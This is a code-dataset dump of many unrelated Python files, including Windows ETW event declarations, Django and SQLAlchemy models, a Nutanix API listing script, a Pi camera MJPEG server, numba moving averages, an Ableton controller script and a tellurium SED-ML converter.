@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=881, version=0)
class Microsoft_Windows_DXGI_881_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=882, version=0)
class Microsoft_Windows_DXGI_882_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"SyncInterval" / Int32ul,
"Flags" / Int32ul,
"PartnerFlags" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=883, version=0)
class Microsoft_Windows_DXGI_883_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=884, version=0)
class Microsoft_Windows_DXGI_884_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"Duration" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=885, version=0)
class Microsoft_Windows_DXGI_885_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=886, version=0)
class Microsoft_Windows_DXGI_886_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"DesiredPresentDuration" / Int32ul,
"pClosestSmallerPresentDuration" / Int64ul,
"pClosestLargerPresentDuration" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=887, version=0)
class Microsoft_Windows_DXGI_887_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=888, version=0)
class Microsoft_Windows_DXGI_888_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"iOutput" / Int32ul,
"iOutputType" / Int32ul,
"ppOutput" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=889, version=0)
class Microsoft_Windows_DXGI_889_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
|
StarcoderdataPython
|
1678630
|
from django.urls import path, include
from rest_framework.routers import DefaultRouter
from .views import SharingViewSets, CommentViewSets, LikesToSharingViewSets
router = DefaultRouter()
# sharing
router.register('sharing', SharingViewSets)
# likesToSharing
router.register('likes', LikesToSharingViewSets)
# comments
router.register('comments', CommentViewSets)
app_name = 'sharing'
urlpatterns = [
path(r'', include(router.urls)),
]
|
StarcoderdataPython
|
3265923
|
#-*- encoding: utf-8 -*-
import os
import sys
import glob
import json
# Create cache dir in project root
cache = os.sep.join(__file__.split(os.sep)[:-2])+os.sep+"cache"
try:
os.mkdir(cache)
except:
pass
def _delete_file(filename):
''' delete a file '''
os.remove(cache+os.sep+filename)
def _safe_size(payload, limit):
''' if file size limit return false '''
limit = limit * 1024
size = sys.getsizeof(payload)
if size > limit:
return False
return True
def _file_write(base64_string, file_link_hash):
''' writes content to file as base64_string '''
with open(cache+os.sep+file_link_hash, 'wb') as fs:
fs.write(base64_string)
return True
def _file_load(file_link_hash):
''' return content of file as dictionary '''
try:
with open(cache+os.sep+file_link_hash, 'rb') as fs:
payload = fs.read()
except IOError:
return False
return payload
def _file_link(json):
''' generates hash based on file content '''
return str(hex(hash( json ).__abs__()).replace('0x', "").upper())
def get_history(conf):
''' returns list of files from history,
and removes the oldest if list exceeds cache limit '''
limit = conf['link_history_size']
files = glob.glob(cache+os.sep+"*")
files.sort(key=os.path.getmtime)
list_of_links = [ f.split(os.sep)[-1] for f in files.__reversed__() ]
if len(list_of_links) > limit:
_delete_file(list_of_links[-1])
list_of_links = list_of_links[:-1]
return list_of_links
def save_content(payload, conf):
''' save content to a file if file does not exceed
link_history_file_size '''
limit = conf['link_history_file_size']
content = json.dumps(payload, ensure_ascii=False, encoding='utf-8')
if _safe_size(content, limit):
link = _file_link(content)
_file_write(content, link)
else:
return "size_limit_exceeded!"
return link
def load_content(link_id):
''' get file content, return as dictionary '''
content = _file_load(link_id)
try:
#special characters don't work to well here sadly
payload = json.loads(content, encoding='utf-8')
except:
return False
return payload
# -- testing --
#from render_state import mash
#link = save_content(payload)
#data = load_content(link)
#print mash(data['grains'][0], data['pillar'][0], data['state'][0])[0]
|
StarcoderdataPython
|
5022081
|
from JDI.web.selenium.elements.base.clickable import Clickable
from JDI.web.selenium.elements.common.text import Text
class ClickableText(Clickable, Text):
def __init__(self, by_locator=None, web_element=None):
if by_locator is not None:
super(ClickableText, self).__init__(by_locator=by_locator)
elif web_element is not None:
super(ClickableText, self).__init__(web_element=web_element)
else:
super(ClickableText, self).__init__()
|
StarcoderdataPython
|
6622114
|
<gh_stars>1-10
from .bases import *
from .crawlino_model import *
from .plugins_models import *
from .input_model import *
|
StarcoderdataPython
|
3383124
|
<reponame>sgriffith3/2022-01-04-Python
car = input("Whatchoo got? ")
print(car)
|
StarcoderdataPython
|
6612265
|
<reponame>DanSeraf/spyd
from spyd.registry_manager import register
from spyd.utils.dictionary_get import dictget
@register('client_message_handler')
class EditentHandler(object):
message_type = 'N_EDITENT'
@staticmethod
def handle(client, room, message):
player = client.get_player()
entity_id = message['entid']
entity_type = message['type']
x, y, z = dictget(message, 'x', 'y', 'z')
attrs = message['attrs']
room.handle_player_event('edit_entity', player, entity_id, entity_type, x, y, z, attrs)
|
StarcoderdataPython
|
9719750
|
<reponame>coderMaruf/leetcode-1<filename>2020_July_Leetcode_30_days_challenge/Week_2_Subsets/by_bitmap.py<gh_stars>10-100
'''
Description:
Given a set of distinct integers, nums, return all possible subsets (the power set).
Note: The solution set must not contain duplicate subsets.
Example:
Input: nums = [1,2,3]
Output:
[
[3],
[1],
[2],
[1,2,3],
[1,3],
[2,3],
[1,2],
[]
]
'''
class Solution:
def subsets(self, nums):
size = len(nums)
upper_bound = 1 << size
solution = [ [ nums[i]for i in range(size) if serial_num & (1<<i) ] for serial_num in range(upper_bound)]
return solution
# n : the length of input list
## Time Complexity: O( 2^n )
#
# The overhead in time is the cost of subset generation, which is of O( 2^n )
## Space Complexity: O( 2^n )
#
# The overhead in space is the storage for all subsets, which is of O( 2^n )
import unittest
class Testing( unittest.TestCase ):
def test_case_1( self ):
result = Solution().subsets( nums = [1,2,3] )
self.assertCountEqual(result, [ [3], [1], [2], [1,2,3], [1,3], [2,3], [1,2], [] ] )
if __name__ == '__main__':
unittest.main()
|
StarcoderdataPython
|
9798483
|
<reponame>halsayed/whmcs-demo
import os
import base64
import requests
# disable ssl warnings
import urllib3
urllib3.disable_warnings()
# API configuration and parameters ...
pc_address = '10.38.15.9'
username = 'admin'
password = os.environ.get('PASSWORD', '<PASSWORD>!') # change the password to a suitable value
authorization = base64.b64encode(f'{username}:{password}'.encode()).decode()
url = f'https://{pc_address}:9440/api/nutanix/v3'
kwargs = {
'verify': False,
'headers': {'Authorization': f'Basic {authorization}'}
}
# ==========================================================================================
# List the available clusters (PEs) connected to this Prism Central
# ==========================================================================================
payload = {'kind': 'cluster'}
resp = requests.post(f'{url}/clusters/list', json=payload, **kwargs)
if resp.status_code == 200:
count = 1
print('\n==========================\nAvailable Clusters\n==========================')
for cluster in resp.json()['entities']:
# Note: PC itself is a cluster, but it cannot be used as a resource to provision VMs,
# check for 'AOS' type cluster to run VMs
if 'AOS' in cluster['status']['resources']['config'].get('service_list', []):
print(f'({count}) Name: {cluster["status"]["name"]},\t UUID: {cluster["metadata"]["uuid"]}')
count += 1
else:
print(f'ERROR - API call failed, status code: {resp.status_code}, message: {resp.content}')
# ==========================================================================================
# List the available Networks
# ==========================================================================================
payload = {'kind': 'subnet', 'length': 999}
resp = requests.post(f'{url}/subnets/list', json=payload, **kwargs)
if resp.status_code == 200:
count = 1
print('\n==========================\nAvailable Subnets\n==========================')
for subnet in resp.json()['entities']:
print(f'({count}) Name: {subnet["status"]["name"]},\t UUID: {subnet["metadata"]["uuid"]}')
count += 1
else:
print(f'ERROR - API call failed, status code: {resp.status_code}, message: {resp.content}')
# ==========================================================================================
# List the available Images
# ==========================================================================================
payload = {'kind': 'image', 'length': 999}
resp = requests.post(f'{url}/images/list', json=payload, **kwargs)
if resp.status_code == 200:
count = 1
print('\n==========================\nAvailable Images\n==========================')
for image in resp.json()['entities']:
print(f'({count}) Name: {image["spec"]["name"]},\t UUID: {image["metadata"]["uuid"]}')
count += 1
else:
print(f'ERROR - API call failed, status code: {resp.status_code}, message: {resp.content}')
|
StarcoderdataPython
|
5067050
|
# Copyright (c) 2018 Graphcore Ltd. All rights reserved.
import sys
import os
import c10driver
import cmdline
import popart
from popart.torch import torchwriter
#we require torch in this file to create the torch Module
import torch
args = cmdline.parse()
nChans = 3
# process batchSize = 2 samples at a time,
# so weights updated on average gradient of
# batchSize = 2 samples. batchSize
# is EXACTLY the batch size.
batchSize = 2
# Return requested tensors every batchesPerStep = 3 cycles.
# so only communicate back to host every 2*3 = 6 samples.
batchesPerStep = 3
# anchors, and how they are returned: in this example,
# return the l1 loss "out",
# and the input tensor "image0"
anchors = {
"out": popart.AnchorReturnType("Final"),
"image0": popart.AnchorReturnType("Final")
}
dataFlow = popart.DataFlow(batchesPerStep, anchors)
# willow is non-dynamic. All input Tensor shapes and
# types must be fed into the Session constructor.
# In this example there is 1 streamed input, image0.
inputShapeInfo = popart.InputShapeInfo()
inputShapeInfo.add("image0",
popart.TensorInfo("FLOAT", [batchSize, nChans, 32, 32]))
inNames = ["image0"]
outNames = ["out"]
#cifar training data loader : at index 0 : image, at index 1 : label.
cifarInIndices = {"image0": 0}
class Module0(torch.nn.Module):
def __init__(self):
torch.nn.Module.__init__(self)
self.conv1 = torch.nn.Conv2d(nChans,
nChans,
kernel_size=(3, 3),
stride=1,
padding=(1, 3),
bias=False)
def forward(self, inputs):
"""out = relu(conv(in))"""
image0 = inputs[0]
x = self.conv1(image0)
x = torch.sum(x, dim=1)
x = torch.sum(0.1 * torch.abs(x))
return x
# Set arbitrary seed so model weights are initialized to the
# same values each time the test is run
torch.manual_seed(1)
torchWriter = torchwriter.PytorchNetWriter(
inNames=inNames,
outNames=outNames,
optimizer=popart.ConstSGD(0.001),
inputShapeInfo=inputShapeInfo,
dataFlow=dataFlow,
### Torch specific:
module=Module0(),
samplesPerBatch=batchSize)
c10driver.run(torchWriter, None, args.outputdir, cifarInIndices, args.device,
args.hw_id)
|
StarcoderdataPython
|
1885405
|
#!/usr/bin/python3
import time
from http.server import HTTPServer, BaseHTTPRequestHandler
from picamera import PiCamera
class MjpegMixin:
"""
Add MJPEG features to a subclass of BaseHTTPRequestHandler.
"""
mjpegBound = 'eb4154aac1c9ee636b8a6f5622176d1fbc08d382ee161bbd42e8483808c684b6'
frameBegin = 'Content-Type: image/jpeg\n\n'.encode('ascii')
frameBound = ('\n--' + mjpegBound + '\n').encode('ascii') + frameBegin
def mjpegBegin(self):
self.send_response(200)
self.send_header('Content-Type',
'multipart/x-mixed-replace;boundary=' + MjpegMixin.mjpegBound)
self.end_headers()
self.wfile.write(MjpegMixin.frameBegin)
def mjpegEndFrame(self):
self.wfile.write(MjpegMixin.frameBound)
class SmoothedFpsCalculator:
"""
Provide smoothed frame per second calculation.
"""
def __init__(self, alpha=0.1):
self.t = time.time()
self.alpha = alpha
self.sfps = None
def __call__(self):
t = time.time()
d = t - self.t
self.t = t
fps = 1.0 / d
if self.sfps is None:
self.sfps = fps
else:
self.sfps = fps * self.alpha + self.sfps * (1.0 - self.alpha)
return self.sfps
class Handler(BaseHTTPRequestHandler, MjpegMixin):
def do_GET(self):
if self.path == '/contour.mjpeg':
self.handleContourMjpeg()
else:
self.send_response(404)
self.end_headers()
def handleContourMjpeg(self):
import cv2
import numpy as np
width, height, blur, sigma = 640, 480, 2, 0.33
fpsFont, fpsXY = cv2.FONT_HERSHEY_SIMPLEX, (0, height-1)
self.mjpegBegin()
with PiCamera() as camera:
camera.resolution = (width, height)
camera.video_denoise = False
camera.image_effect = 'blur'
camera.image_effect_params = (blur,)
yuv = np.empty((int(width * height * 1.5),), dtype=np.uint8)
sfps = SmoothedFpsCalculator()
for x in camera.capture_continuous(yuv, format='yuv', use_video_port=True):
image = yuv[:width*height].reshape((height, width))
v = np.median(image)
lower = int(max(0, (1.0 - sigma) * v))
upper = int(min(255, (1.0 + sigma) * v))
image = cv2.Canny(image, lower, upper)
cv2.putText(image, '%0.2f fps' %
sfps(), fpsXY, fpsFont, 1.0, 255)
self.wfile.write(cv2.imencode('.jpg', image)[1])
self.mjpegEndFrame()
def run(port=8000):
httpd = HTTPServer(('', port), Handler)
httpd.serve_forever()
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='HTTP streaming camera.')
parser.add_argument('--port', type=int, default=8000,
help='listening port number')
args = parser.parse_args()
run(port=args.port)
|
StarcoderdataPython
|
1678660
|
<filename>python_teste/python_aulas/aula_96.py<gh_stars>1-10
def area(a, b):
ar = a * b
print(f'A área de um terreno {a:.1f}x{b:.1f} é de {ar:.1f}m²')
#Programa Principal
largura = float(input('Largura: '))
comprimento = float(input('Comprimento: '))
area(largura, comprimento)
|
StarcoderdataPython
|
225732
|
<reponame>David100459/final
from django.db import models
# Create your models here.
class student(models.Model) :
firt_name = models.CharField(max_length=50)
last_name = models.CharField(max_length=50)
code = models.CharField(max_length=10)
created_at = models.DateTimeField()
class subject(models.Model) :
name = models.CharField(max_length=50)
code = models.CharField(max_length=10)
course = models.CharField(max_length=3)
created_at = models.DateTimeField()
class subject2(models.Model) :
id_student = models.ForeignKey(student, on_delete=models.CASCADE)
id_subject = models.ForeignKey(subject, on_delete=models.CASCADE)
created_at = models.DateTimeField()
|
StarcoderdataPython
|
4831074
|
import cv2
import pandas as pd
def extract_SURF_data(inputpath, outputpath):
img = cv2.imread(inputpath)
surf = cv2.xfeatures2d.SURF_create(4000)
kps, features = surf.detectAndCompute(img, None)
kps_data = []
for kp in kps:
# 关键点X,Y,从左到右0~255,从上到下0~255。关键点角度。关键点直径大小
# print(kp.pt[0], kp.pt[1], kp.angle, kp.size)
kps_data.append([kp.pt[0], kp.pt[1], kp.angle, kp.size])
# 统一特征点为15个
kps_data_len = len(kps_data)
if kps_data_len < 15:
for i in range(15-kps_data_len):
kps_data.append([0, 0, 0, 0])
elif kps_data_len > 15:
del kps_data[15:]
# 按照半径排序
kps_data.sort(key=lambda x: x[3], reverse=True)
titles = ['x', 'y', 'angle', 'diameter']
dt = pd.DataFrame(kps_data, columns=titles)
sheet_name = inputpath.split('/')[-1][:-4]
dt.to_excel(outputpath, sheet_name=sheet_name, index=0)
|
StarcoderdataPython
|
4994708
|
<filename>Support/Fuego/Pythia/pythia-0.4/packages/pyre/pyre/graph/Graph.py
#!/usr/bin/env python
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# <NAME>
# California Institute of Technology
# (C) 1998-2003 All Rights Reserved
#
# <LicenseText>
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
from Drawable import Drawable
from Node import Node
from Edge import Edge
class Graph(Drawable):
# nameless nodes set defaults for subsequent nodes
def node(self, id=""):
node = Node(id)
self._nodes.append(node)
return node
def connect(self, source, sinks):
edge = Edge(source, sinks)
self._edges.append(edge)
return edge
def __init__(self, name):
Drawable.__init__(self)
self._graph = ""
self._nodes = []
self._edges = []
self._id = name
return
_validAttributes = {
"center" : ["true", "false"],
"clusterrank" : ["local", "global", "none"],
"color" : None,
"concentrate": ["true", "false"],
"fontcolor" : None,
"fontname" : None,
"fontsize" : None,
"label" : None,
"layers" : None,
"margin" : None,
"mclimit" : None,
"nodesep" : None,
"nslimit" : None,
"ordering" : None,
"orientation" : None,
"page" : None,
"rank" : None,
"rankdir" : None,
"ranksep" : None,
"ratio" : None,
"size" : None
}
# version
__id__ = "$Id$"
#
# End of file
|
StarcoderdataPython
|
5013308
|
import numpy as np
import numba as nb
import pandas as pd
import qnt.ta.ndadapter as nda
import typing as tp
import time
import sys
from qnt.log import log_info, log_err
@nb.jit(nb.float64[:](nb.float64[:], nb.int64), nopython=True)
def lwma_np_1d(series: np.ndarray, periods: int) -> np.ndarray:
tail = np.empty((periods,), dtype=np.double)
not_nan_cnt = 0
result = np.full(series.shape, np.nan, dtype=np.double)
w_sum = periods * (periods + 1) / 2
for i in range(series.shape[0]):
if not np.isnan(series[i]):
idx = not_nan_cnt % periods
tail[idx] = series[i]
not_nan_cnt += 1
if not_nan_cnt >= periods:
sum = 0
for j in range(periods):
w = (periods - j)
sum += tail[idx - j] * w
result[i] = sum / w_sum
return result
@nb.jit(nb.float64[:](nb.float64[:], nb.float64[:]), nopython=True, error_model="numpy")
def wma_np_1d(series: np.ndarray, weights: np.ndarray) -> np.ndarray:
periods = len(weights)
tail = np.empty((periods,), dtype=np.double)
not_nan_cnt = 0
result = np.full(series.shape, np.nan, dtype=np.double)
w_sum = weights.sum()
for i in range(series.shape[0]):
if not np.isnan(series[i]):
idx = not_nan_cnt % periods
tail[idx] = series[i]
not_nan_cnt += 1
if not_nan_cnt >= periods:
sum = 0
for j in range(periods):
sum += tail[idx - j] * weights[j]
result[i] = sum / w_sum
return result
@nb.jit(nb.float64[:](nb.float64[:], nb.float64[:], nb.int64), nopython=True, error_model="numpy")
def vwma_np_1d(price: np.ndarray, volume: np.ndarray, periods:int) -> np.ndarray:
price_tail = np.empty((periods,), dtype=np.double)
volume_tail = np.empty((periods,), dtype=np.double)
not_nan_cnt = 0
result = np.full(price.shape, np.nan, dtype=np.double)
for i in range(price.shape[0]):
if not np.isnan(price[i]) and not np.isnan(volume[i]):
idx = not_nan_cnt % periods
price_tail[idx] = price[i]
volume_tail[idx] = volume[i]
not_nan_cnt += 1
if not_nan_cnt >= periods:
result[i] = (price_tail * volume_tail).sum() / volume_tail.sum()
return result
last_alert = 0
def wma(series: nda.NdType, weights: tp.Union[tp.List[float], np.ndarray] = None) -> nda.NdType:
"""
:param weights: weights in decreasing order. lwma(series, 3) == wma(series, [3,2,1])
"""
global last_alert
if (weights is None or type(weights) is int):
if time.time() - last_alert > 60:
last_alert = time.time()
log_err("Warning! wma(series:ndarray, periods:int) deprecated. Use lwma instead of wma.")
return lwma(series,weights)
if type(weights) is list:
weights = np.array(weights, np.float64)
return nda.nd_universal_adapter(wma_np_1d, (series,), (weights,))
def lwma(series: nda.NdType, periods: int = 20):
return nda.nd_universal_adapter(lwma_np_1d, (series,), (periods,))
def vwma(price: nda.NdType, volume: nda.NdType, periods: int = 20):
return nda.nd_universal_adapter(vwma_np_1d, (price, volume), (periods,))
if __name__ == '__main__':
log_info(np.divide(1., 0.))
d1_array = np.array([0, 1, 2, 3, 4, np.nan, 5, np.nan, 6, 7], np.double)
d1_result_lwma = lwma(d1_array, 3)
d1_result_wma = wma(d1_array, [3, 2, 1])
d1_result_vwma = vwma(d1_array, d1_array, 3)
log_info("d1_array:\n", d1_array, '\n')
log_info('d1_result_lwma:\n', d1_result_lwma)
log_info('d1_result_wma:\n', d1_result_wma)
log_info('d1_result_vwma:\n', d1_result_vwma)
log_info('---')
np_array = np.array([
[
[1, 2, 3, 4],
[5, 6, 7, 8],
], [
[2, 3, 4, 5],
[6, 7, 8, 9],
]
], np.double)
np_result = lwma(np_array, 2)
log_info("np_array:\n", np_array, '\n')
log_info('np_result:\n', np_result)
log_info('---')
date_rng = pd.date_range(start='2018-01-01', end='2018-01-04', freq='D')
df_array = pd.DataFrame(date_rng, columns=['time']).set_index('time')
df_array['close'] = np.array([1, 2, 3, 4], dtype=np.float)
df_array['open'] = np.array([5, 6, 7, 8], dtype=np.float)
df_result = lwma(df_array, 2)
log_info("df_array:\n", df_array, '\n')
log_info('df_result:\n', df_result)
log_info('---')
xr_array = df_array.to_xarray().to_array("field")
xr_result = lwma(xr_array, 2)
log_info("xr_array:\n", xr_array.to_pandas(), '\n')
log_info('xr_result:\n', xr_result.to_pandas())
log_info('---')
from qnt.data import load_data, load_assets, ds
from qnt.xr_talib import WMA
import time
assets = load_assets()
ids = [i['id'] for i in assets[0:2000]]
data = load_data(assets=ids, dims=(ds.TIME, ds.ASSET, ds.FIELD), forward_order=True)
price = data.sel(field='close')
vol = data.sel(field='vol')
t1 = time.time()
ma1 = WMA(price, 25)
t2 = time.time()
ma2 = lwma(price, 25)
t3 = time.time()
log_info(
"relative delta =", abs((ma1.fillna(0) - ma2.fillna(0)) / data).max().values,
"t(talib)/t(lwma) =", (t2 - t1) / (t3 - t2)
)
ma_lw = lwma(price, 3)
ma_w = wma(price, [3, 2, 1])
log_info("abs(ma_lw - ma_w).sum() = ", abs(ma_lw - ma_w).fillna(0).sum().values)
ma_vw = vwma(price, vol, 3)
|
StarcoderdataPython
|
311164
|
<filename>ZeRO_SLMkII/ZeRO_SLMkII.py
import Live
import MidiRemoteScript
from MixerController import MixerController
from DisplayController import DisplayController
from consts import *
class ZeRO_SLMkII():
def __init__(self, c_instance):
self.__c_instance = c_instance
self.__c_instance.log_message("Setting up ZeRO_SLMkII.")
self.__automap_has_control = False
self.__display_controller = DisplayController(self, c_instance)
self.__mixer_controller = MixerController(self, self.__display_controller, c_instance)
self.__components = [self.__mixer_controller, self.__display_controller]
self.__update_hardware_delay = -1
def disconnect(self):
"""Called right before we get disconnected from Live
"""
for c in self.__components:
c.disconnect()
self.send_midi(ALL_LEDS_OFF_MESSAGE)
self.send_midi(GOOD_BYE_SYSEX_MESSAGE)
def song(self):
"""returns a reference to the Live song instance that we do control
"""
return self.__c_instance.song()
def can_lock_to_devices(self):
"""Live -> Script
Live can ask the script whether it can be locked to devices
"""
return False
def supports_pad_translation(self):
return True
def instance_identifier(self):
return self.__c_instance.instance_identifier()
def connect_script_instances(self, instanciated_scripts):
"""
Called by the Application as soon as all scripts are initialized.
You can connect yourself to other running scripts here, as we do it
connect the extension modules (MackieControlXTs).
"""
pass
def request_rebuild_midi_map(self):
"""When the internal MIDI controller has changed in a way that you need to rebuild
the MIDI mappings, request a rebuild by calling this function
This is processed as a request, to be sure that its not too often called, because
its time-critical.
"""
self.__c_instance.request_rebuild_midi_map()
def send_midi(self, midi_event_bytes):
"""Use this function to send MIDI events through Live to the _real_ MIDI devices
that this script is assigned to.
"""
if not self.__automap_has_control:
self.__c_instance.send_midi(midi_event_bytes)
def refresh_state(self):
"""Send out MIDI to completely update the attached MIDI controller.
Will be called when requested by the user, after for example having reconnected
the MIDI cables...
"""
self.__update_hardware_delay = 5
def __update_hardware(self):
self.__automap_has_control = False
self.send_midi(WELCOME_SYSEX_MESSAGE)
for c in self.__components:
c.refresh_state()
def build_midi_map(self, midi_map_handle):
"""Build DeviceParameter Mappings, that are processed in Audio time, or
forward MIDI messages explicitly to our receive_midi_functions.
Which means that when you are not forwarding MIDI, nor mapping parameters, you will
never get any MIDI messages at all.
"""
if not self.__automap_has_control:
for c in self.__components:
c.build_midi_map(self.__c_instance.handle(), midi_map_handle)
self.__c_instance.set_pad_translation(PAD_TRANSLATION)
def update_display(self):
"""Aka on_timer. Called every 100 ms and should be used to update display relevant
parts of the controller only...
"""
if self.__update_hardware_delay > 0:
self.__update_hardware_delay -= 1
if self.__update_hardware_delay == 0:
self.__update_hardware()
self.__update_hardware_delay = -1
for c in self.__components:
c.update_display()
def receive_midi(self, midi_bytes):
"""MIDI messages are only received through this function, when explicitly
forwarded in 'build_midi_map'.
"""
self.__c_instance.log_message("received midi: " + str(midi_bytes))
if midi_bytes[0] & 240 in (NOTE_ON_STATUS, NOTE_OFF_STATUS):
channel = midi_bytes[0] & 15
note = midi_bytes[1]
velocity = midi_bytes[2]
if note in fx_notes:
self.__mixer_controller.receive_midi_note(note, velocity, midi_bytes[0] & 240)
elif midi_bytes[0] & 240 == CC_STATUS:
channel = midi_bytes[0] & 15
cc_no = midi_bytes[1]
cc_value = midi_bytes[2]
if cc_no in mx_ccs or cc_no in fx_ccs:
self.__mixer_controller.receive_midi_cc(cc_no, cc_value)
else:
print 'err2: unknown MIDI message %s' % str(midi_bytes)
elif midi_bytes[0] == 240:
if len(midi_bytes) == 13 and midi_bytes[1:4] == (0, 32, 41):
if midi_bytes[8] == ABLETON_PID and midi_bytes[10] == 1:
if not self.__automap_has_control:
self.send_midi(ALL_LEDS_OFF_MESSAGE)
for c in self.__components:
if not self.__automap_has_control:
c.refresh_state()
self.request_rebuild_midi_map()
else:
print 'err3: unknown MIDI message %s' % str(midi_bytes)
|
StarcoderdataPython
|
5048414
|
from sqlalchemy import *
from sqlalchemy.orm import validates, relationship
from db import db
class DeploymentTarget(db.Model):
__tablename__ = "deployment_target"
id = Column(String, primary_key=True)
deployment_target_type_id = Column(String, ForeignKey('deployment_target_type.id'))
partition_id = Column(String, ForeignKey('partition.id'))
name = Column(String(255), nullable=False)
defaults = Column(Text)
native_id = Column(String)
partition = relationship("Partition", back_populates="deployment_targets")
fleets = relationship("Fleet", back_populates="deployment_target")
type = relationship("DeploymentTargetType", back_populates="targets")
deployments = relationship('Deployment', back_populates='deployment_target')
def __repr__(self):
return self.id
@validates('id')
def validate_name(self, key, value):
assert value != ''
return value
@db.event.listens_for(DeploymentTarget, 'before_update')
@db.event.listens_for(DeploymentTarget, 'before_insert')
def my_before_insert_listener(mapper, connection, target):
__update_id__(target)
def __update_id__(target):
target.id = target.partition_id + ':' + target.deployment_target_type_id + ':' + target.name
|
StarcoderdataPython
|
3281872
|
class Individual:
"""Represents an image"""
def __init__(self, **kwargs):
self.genome = kwargs['genome'] # List of genes
self.fitness = 0 # Fitness value for this individual
|
StarcoderdataPython
|
1623644
|
<gh_stars>1-10
from bs4 import BeautifulSoup, element
import re
from matplotlib.cm import ScalarMappable, RdYlGn
from core import *
from selectors import *
from actors import *
from evaluators import *
from autocues import *
# Triggers:
policy = ScoringPolicy()
policy.append((ScoreAggregator(), EVAL_CONTAINER))
policy.append((RegExCounter(",", 1), EVAL_PARAGRAPH))
policy.append((Limiter(RegExCounter("(\w)+(['`]\w)?", 1), 20), EVAL_PARAGRAPH))
policy.append((CSSSelector("a", Scorer(FixedValue(-50))), PRE_TRAVERSAL))
policy.append((ScoreSelector(Pruner()), POST_TRAVERSAL))
#policy['parent'] = (ParentScorer(), EVAL_CONTAINER) # aggregates scores from children
#policy['commas'] = (RegExCountScorer(",", 1), EVAL_PARAGRAPH)
#policy['words'] = (RegExCountScorer("(\w)+(['`]\w)?", 1), EVAL_PARAGRAPH)
#policy['children'] = (CountChildrenScorer("p", 10), EVAL_CONTAINER)
#policy['paragraph'] = (FixedValueScorer(1), EVAL_PARAGRAPH)
#policy['container'] = (FixedValueScorer(1), EVAL_CONTAINER)
if __name__ == '__main__':
html_doc = """ <html><head><title>The Dormouse's story</title></head><body><div><p class="title"><b>The Dormouse's story</b></p> <p class="story">Once upon a time there were three little sisters; and their names were <a href="http://example.com/elsie" class="sister" id="link1">Elsie</a>, <a href="http://example.com/lacie" class="sister" id="link2">Lacie</a> and <a href="http://example.com/tillie" class="sister" id="link3">Tillie</a>; and they lived at the bottom of a well.</p> <p class="story">...</p></div></body></html>"""
soup = BeautifulSoup(html_doc)
for tag in reversed(soup.find_all(["p","a","b"])):
policy.execute(tag, EVAL_PARAGRAPH)
policy.execute(soup, PRE_TRAVERSAL)
policy.execute(soup.find("body"), EVAL_CONTAINER)
for tag in soup.find_all():
print tag.name, "=", tag.scores
container = get_tag_with_max_score(soup)
style_all_tags(soup, container)
html_styled = soup.find("body").prettify(formatter="html")
policy.execute(container, POST_TRAVERSAL)
print container.get_text()
|
StarcoderdataPython
|
4840893
|
# -*- coding: utf-8 -*-
"""
Created on Thu Oct 01 16:19:44 2015
@author: <NAME>
"""
import os.path
import sys, StringIO
import antimony
import roadrunner
import tellurium as te
import zipfile
import tempfile
import re
try:
import phrasedml
except ImportError as e:
roadrunner.Logger.log(roadrunner.Logger.LOG_WARNING, str(e))
try:
import tecombine as combine
except ImportError as e:
roadrunner.Logger.log(roadrunner.Logger.LOG_WARNING, str(e))
class tePhrasedml(object):
def __init__(self, antimonyStr, phrasedmlStr):
modelispath = False
if type(antimonyStr) != str:
raise Exception("Invalid Antimony string/model path")
else:
if os.path.exists(antimonyStr): #incomplete - load model path directly.
modelispath = True
else:
pass
if type(phrasedmlStr) != str:
raise Exception("Invalid PhrasedML string")
tePhrasedml.modelispath = modelispath
tePhrasedml.antimonyStr = antimonyStr
tePhrasedml.phrasedmlStr = phrasedmlStr
def execute(self):
outputstr = self.createpython()
try:
exec(outputstr)
except Exception as e:
raise e
def createpython(self): # Create and return Python script given antimony and phrasedml strings
rePath = r"(\w*).load\('(.*)'\)"
reLoad = r"(\w*) = roadrunner.RoadRunner\(\)"
reModel = r"""(\w*) = model ('|")(.*)('|")"""
phrasedmllines = self.phrasedmlStr.splitlines()
for i,s in enumerate(phrasedmllines):
reSearchModel = re.split(reModel, s)
if len(reSearchModel) > 1:
modelsource = str(reSearchModel[3])
modelname = os.path.basename(modelsource)
modelname = str(modelname).replace(".xml", '')
phrasedml.setReferencedSBML(modelsource, te.antimonyTosbml(self.antimonyStr))
sedmlstr = phrasedml.convertString(self.phrasedmlStr)
if sedmlstr == None:
raise Exception(phrasedml.getLastError())
phrasedml.clearReferencedSBML()
fd1, sedmlfilepath = tempfile.mkstemp()
os.write(fd1, sedmlstr)
pysedml = te.SedmlToRr.sedml_to_python(sedmlfilepath)
if self.modelispath == False:
lines = pysedml.splitlines()
for i,s in enumerate(lines):
reSearchPath = re.split(rePath, s)
if len(reSearchPath) > 1:
del lines[i]
for i,s in enumerate(lines):
reSearchLoad = re.split(reLoad, s)
if len(reSearchLoad) > 1:
